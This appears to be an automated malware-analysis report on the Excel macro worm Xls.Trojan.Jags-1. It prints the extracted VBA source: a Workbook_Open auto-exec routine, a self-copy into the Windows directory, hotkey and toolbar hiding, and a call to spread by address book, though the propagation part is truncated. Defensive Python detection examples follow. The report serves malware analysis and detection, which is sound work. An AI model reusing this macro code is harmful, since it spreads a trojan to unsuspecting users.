Verdict: MALICIOUS, risk score 260
Malware Insights
MITRE ATT&CK:
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
- T1566.001 Phishing: Spearphishing Attachment
The critical ClamAV detection identifies this file as a known Excel macro trojan, Xls.Trojan.Jags-1. The extracted source shows the infection logic: Workbook_Open checks whether any .xls file already exists in the Windows directory (the worm's infection marker) and, if none does, calls Initialize, which saves a copy of the workbook into that directory under the current user's name via SaveCopyAs (commented in the source as "our polymorphic technique"), disables hotkeys and hides the toolbar, calls ASOCIAR_JAGS90 and Read_Your_BookAddress (commented "send the worm"), then restores hotkeys and the toolbar so nothing looks amiss; UserForm1 is shown on every open. Native Win32 exports (GetWindowsDirectoryA in kernel32, GetUserNameA in advapi32) are declared to resolve the drop path and user name, and PolyName builds a random alphabetic string whose use lies in the truncated portion. The CreateObject call flagged by the heuristics is also past the preview truncation, so the object it instantiates is not visible here, but together with the read_address_book module it points to self-propagation by e-mail from the victim's address book rather than a download of a second-stage payload. Persistence in the visible code is limited to the copy written to the Windows directory; no Run-key or startup-folder write appears in the preview.
Heuristics (5)
- ClamAV: Xls.Trojan.Jags-1 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Xls.Trojan.Jags-1
- VBA macros detected [medium, OLE_VBA_MACROS, 3 related findings]: Document contains VBA macro code
- Workbook_Open macro [high, OLE_VBA_WBOPEN]: Workbook_Open macro, an auto-execution entry point that runs when the workbook is opened
- CreateObject call [high, OLE_VBA_CREATEOBJ]: CreateObject call
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where the visible source is unavailable.
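The escalation logic behind the OLE_VBA_* findings above (auto-exec entry point plus execution/object/drop tokens) can be reproduced over decoded VBA source. The scanner below is an added example, not the analyzer's own heuristic code; it runs over a constructed VBA snippet that mirrors the structure of the extracted macro (Declare of GetWindowsDirectoryA, SaveCopyAs into the Windows directory, a Dir() infection-marker guard in Workbook_Open). The `progId` passed to CreateObject is a placeholder, because the page's preview is truncated before the real call.

```python
import re

# Entry points that Office runs with no user interaction beyond opening the file.
AUTOEXEC = ("Workbook_Open", "Auto_Open", "Document_Open", "AutoOpen",
            "Workbook_Activate", "Auto_Close", "Document_Close")

# Tokens that raise severity when they co-occur with an auto-exec entry point.
SUSPICIOUS = {
    "CreateObject": "instantiates a COM object (mail, scripting or filesystem automation)",
    "Shell": "starts a process",
    "URLDownloadToFile": "downloads a file",
    "SaveCopyAs": "writes a copy of the workbook to disk",
    "GetWindowsDirectory": "resolves %WINDIR% (drop location)",
    "GetUserName": "reads the logged-on user name",
    "Declare Function": "imports a native DLL export",
}
EXEC_TOKENS = {"CreateObject", "Shell", "URLDownloadToFile", "SaveCopyAs"}


def scan_vba(source: str) -> dict:
    """Return auto-exec entry points, suspicious tokens, SaveCopyAs targets and
    Dir()-based infection-marker guards found in decoded VBA source."""
    f = {"autoexec": [], "suspicious": {}, "drop_paths": [], "infection_marker": []}
    for name in AUTOEXEC:
        if re.search(r"\bSub\s+%s\b" % re.escape(name), source):
            f["autoexec"].append(name)
    for token, why in SUSPICIOUS.items():
        if re.search(r"\b%s\b" % re.escape(token), source):
            f["suspicious"][token] = why
    # SaveCopyAs (<expr>): keep the path expression exactly as written.
    for m in re.finditer(r"SaveCopyAs\s*\((.*?)\)\s*$", source, re.M):
        f["drop_paths"].append(m.group(1).strip())
    # If Dir(<pattern>) = "" Then: the macro only infects when its marker is absent.
    for m in re.finditer(r'If\s*\(?\s*Dir\s*\((.*?)\)\s*=\s*""', source):
        f["infection_marker"].append(m.group(1).strip())
    return f


def severity(f: dict) -> str:
    """Mirror the report's escalation: macros alone are medium; an auto-exec
    entry point plus an execution/object/drop token is high."""
    if not f["autoexec"]:
        return "medium" if f["suspicious"] else "low"
    return "high" if EXEC_TOKENS & set(f["suspicious"]) else "medium"


# Constructed VBA mirroring the extracted macro's structure (not the sample itself;
# progId is a placeholder because the page's preview is cut before the CreateObject call).
SAMPLE_VBA = r'''
Attribute VB_Name = "ThisWorkbook"
Declare Function GetWindowsDirectory Lib "Kernel32" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Sub Initialize()
    On Error Resume Next
    Application.ActiveWorkbook.SaveCopyAs (OBTENER_DIR_WINDOWS & "\" & UsuarioActual & ".xls")
    Set o = CreateObject(progId)
End Sub
Private Sub Workbook_Open()
    If (Dir(OBTENER_DIR_WINDOWS & "\*.xls", vbArchive) = "") Then
        Call Initialize
    End If
End Sub
'''

if __name__ == "__main__":
    result = scan_vba(SAMPLE_VBA)
    for key, value in result.items():
        print(key, value)
    print("severity:", severity(result))
```

The drop-path and infection-marker expressions are kept verbatim rather than resolved, since `OBTENER_DIR_WINDOWS` and `UsuarioActual` are only known at run time on the victim; the analyst resolves them by reading the helper modules, as the preview below allows.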
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 30551 bytes |

SHA-256: 3a3de0f4848e8272718cc7bb0fa79345e5e0021c342981b2319713f2c87559ff
Detection (ClamAV): Xls.Trojan.Jags-1
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
```vb
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub happyBirthday()
On Error Resume Next
If Day(Now()) = 17 Then
Worksheets(1).Cells(7, 1).Value = "Colombia, September 17, 1978.."
Worksheets(1).Cells(6, 1).Value = "Happy Birthday to my brother Christiam (CJGS)"
With Worksheets(1).Cells(6, 1).Font
.Name = "Arial"
.Size = 20
End With
End If
End Sub
Sub Initialize()
On Error Resume Next
'our polymorphic technique
Application.ActiveWorkbook.SaveCopyAs (OBTENER_DIR_WINDOWS & "\" & UsuarioActual & ".xls")
'show the message afterwards, so it is not saved in the SaveCopyAs copy
Call happyBirthday
'disable before going in
Call UNLOAD_HOTKEYS
Call Ocultar_Barra
Call ASOCIAR_JAGS90
Call Read_Your_BookAddress 'SEND THE WORM
're-enable so as not to leave any suspicion
Call LOAD_HOTKEYS
Call Mostrar_Barra
End Sub
Private Sub Workbook_Open()
If (Dir(OBTENER_DIR_WINDOWS & "\*.xls", vbArchive) = "") Then
Call Initialize
End If
UserForm1.Show
End Sub
Attribute VB_Name = "Hoja1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Worksheet_SelectionChange(ByVal Target As Excel.Range)
End Sub
Attribute VB_Name = "Hoja2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Hoja3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "get_win_directory"
'GET THE WINDOWS DIRECTORY
Declare Function GetWindowsDirectory Lib "Kernel32" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Function OBTENER_DIR_WINDOWS() As String
On Error Resume Next
'GET WINDOWS DIR
Dim WinDir As String
Dim Cadena As String
Dim ret As Long
'GET THE DIR
Cadena = String$(300, Chr$(0))
ret = GetWindowsDirectory(Cadena, Len(Cadena))
WinDir = Left$(Cadena, InStr(Cadena, Chr$(0)) - 1)
OBTENER_DIR_WINDOWS = WinDir
End Function
Attribute VB_Name = "get_win_user"
'TO GET THE WINDOWS USER NAME
Declare Function GetUserName Lib "advapi32.dll" Alias "GetUserNameA" (ByVal lpBuffer As String, nSize As Long) As Long
'GETS THE CURRENT WINDOWS USER NAME
Public Function UsuarioActual() As String
On Error Resume Next
Dim sBuffer As String
Dim lSize As Long
Dim sUsuario As String
sBuffer = Space$(260)
lSize = Len(sBuffer)
Call GetUserName(sBuffer, lSize)
If lSize > 0 Then
sUsuario = Left$(sBuffer, lSize)
'Strip the trailing CHR$(0)...
lSize = InStr(sUsuario, Chr$(0))
If lSize Then
sUsuario = Left$(sUsuario, lSize - 1)
End If
Else
sUsuario = Application.UserName
End If
UsuarioActual = sUsuario
End Function
Attribute VB_Name = "jags90_others"
'gets the name of the #$#%# database
Function aleatorio(hasta As Integer) As Long
Dim x, num
num = 0
For x = 1 To hasta
Randomize
num = num + Rnd()
Next x
aleatorio = num
End Function
Function PolyName() As String
Dim texto, x, hasta
hasta = aleatorio(12) + 1
texto = " "
For x = 1 To hasta
Mid$(texto, x, 1) = Chr(aleatorio(23) + 64)
Next x
PolyName = texto
End Function
Attribute VB_Name = "read_address_book"
Function PolyBody() As S
... (truncated)
```
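Workbook_Open above only runs Initialize when no .xls exists in the Windows directory, and Initialize then drops `<WINDIR>\<username>.xls`. Both facts turn into a host hunt: any .xls in the Windows directory is anomalous, and one named after a local user that carries a legacy Office (OLE2/CFB) header is the dropped copy. The code below is an added example, not part of the report; it runs over a constructed scratch directory standing in for %WINDIR%, and the user names it is given are assumed inputs (on a real host, take them from the local accounts or the profile directory).

```python
from pathlib import Path
import tempfile

# Legacy .xls files (the kind that carry VBA) are OLE2/CFB containers with this 8-byte header.
OLE_MAGIC = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"


def find_dropped_workbooks(windir, usernames):
    """List top-level .xls files in windir as (path, is_ole, named_after_user).

    The match on suffix and stem is case-insensitive, as on NTFS. A hit with
    is_ole False is still anomalous but is not the SaveCopyAs output."""
    wanted = {u.lower() for u in usernames}
    hits = []
    for p in Path(windir).iterdir():
        if not (p.is_file() and p.suffix.lower() == ".xls"):
            continue
        with open(p, "rb") as fh:
            is_ole = fh.read(8) == OLE_MAGIC
        hits.append((str(p), is_ole, p.stem.lower() in wanted))
    return sorted(hits, key=lambda h: h[0].lower())


def demo():
    """Constructed scratch 'Windows directory' (assumption: not a real host)."""
    with tempfile.TemporaryDirectory() as d:
        Path(d, "alice.xls").write_bytes(OLE_MAGIC + b"\x00" * 504)  # constructed dropped copy
        Path(d, "Notes.XLS").write_bytes(b"plain text, not OLE")     # right name pattern, wrong header
        Path(d, "win.ini").write_bytes(b"[fonts]\n")                  # unrelated file, ignored
        return [(Path(p).name, ole, named)
                for p, ole, named in find_dropped_workbooks(d, ["Alice", "bob"])]


if __name__ == "__main__":
    for row in demo():
        print(row)
```

On a live host, point `find_dropped_workbooks` at the real Windows directory and feed it the local account names; the absence of any .xls there is exactly the condition under which this sample would infect on next open, which is worth keeping in mind when judging a clean result.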